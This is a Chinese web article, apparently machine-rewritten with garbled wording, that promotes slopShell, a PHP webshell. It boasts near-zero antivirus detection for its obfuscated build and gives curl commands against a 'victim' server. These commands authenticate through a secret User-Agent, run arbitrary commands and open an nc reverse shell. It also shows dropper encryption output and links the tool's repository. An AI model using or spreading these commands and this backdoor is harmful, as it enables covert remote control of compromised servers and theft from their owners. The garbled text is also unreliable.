首页 » 网站建设 » debianphppear技巧_slopShell你独一需要的PHP Webshell

debianphppear技巧_slopShell你独一需要的PHP Webshell

访客 2024-12-12 0

扫一扫用手机浏览

文章目录 [+]

工具演示视频

视频地址:【点我不雅观看

当前VirusTotal检测率:2/59

debianphppear技巧_slopShell你独一需要的PHP Webshell

当前VirusTotal检测率(稠浊版本):0/59

debianphppear技巧_slopShell你独一需要的PHP Webshell
(图片来自网络侵删)
工具安装

首先,广大研究职员须要运行一台由自己掌握的pgsql做事器,然后根据自己的操作系统类型选择对应的安装命令:

Debian

apt install -y postgresql php php-pear && python -m pip install proxybroker --userRHEL系统

dnf -y -b install postgresql-server postgresql php php-pear && python -m pip install proxybroker --user

一旦这些设置精确并且可以确认它们正在运行,我建议广大研究职员运行命令“pg_ctl”来创建数据库,并实现数据库的初始化和启动,以此确保所有数据库查询都可以正常事情。

工具交互

首先,您须要选择一个有效的User-Agent来利用,你可以把它算作是第一层保护,以防您的webshell被除您之外的任何人意外地创造。
我这里选择的是“sp/1.1”,由于它是一个非范例的User-Agent。
如果设置不当的话,可能会导致渗透测试过程中涌现问题,或者导致脚本和访问要求被屏蔽。
对付Windows版本的话,我没有添加过多内容,由于本人不太喜好Windows开拓。

下面给出的是如何将此webshell与curl一起利用的示例:

curl https://victim/slop.php?qs=cqP -H "User-Agent: sp/1.1" -v

或者,实行下列自定义命令:

curl https://victim/slop.php --data "commander=id" -H "User-Agent: sp/1.1" -v

或者,可以考试测验跟你自己的设备建立一个反向Shell:

curl https://victim/slop.php --data "rcom=1&mthd=nc&rhost=&rport=&shell=sh" -H "User-Agent: sp/1.1" -v工具利用样例

在浏览器中,在不该用正常User-Agent字符串的情形下发送要求(第一层认证):

在命令行终端窗口中,利用curl命令以及-vH "User-Agent: sp1.1"选项实行:

经由稠浊处理后的脚本示例:

天生稠浊后的脚本:

数据加密

当加密程序运行完之后,Dropper脚本将会被加密,并且经由高度稠浊处理,样本输出如下:

Base64 decoded: also a test 123Re-Encoded: YWxzbyBhIHRlc3QgMTIzKey: 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871eKey Length: 96Encryption Result:Array([original] => also a test 123[key] => 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e[encrypted] => meIHs/y6_U7U~7(M[base64_Encoded] => bWVJSAAdcw4veTZfVQU3VX43KE0=)Decrypt Test:Array([key] => 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e[encrypted] => meIHs/y6_U7U~7(M[decrypted] => YWxzbyBhIHRlc3QgMTIz[base64_decoded] => also a test 123[original] => also a test 123)项目地址

slopShell:https://github.com/oldkingcone/slopShell

把稳请不要用于违法的用场.

标签:

相关文章

动态php署理技巧_怎么理解PHP代理模式

在前面的文章中,我们已经给大家大略先容了PHP代理模式的根本观点,相信大家对代理模式也有了一点理解。本节内容就结合详细的代码示例,...

网站建设 2024-12-14 阅读0 评论0

PHP试验05技巧_PHP第十节课操作数据库2

学会利用PHP编写数据库连接的公用功能,并操作数据库链接,实现数据的查询、增加和删除功能。PHP逻辑代码和html代码分离。2、...

网站建设 2024-12-14 阅读0 评论0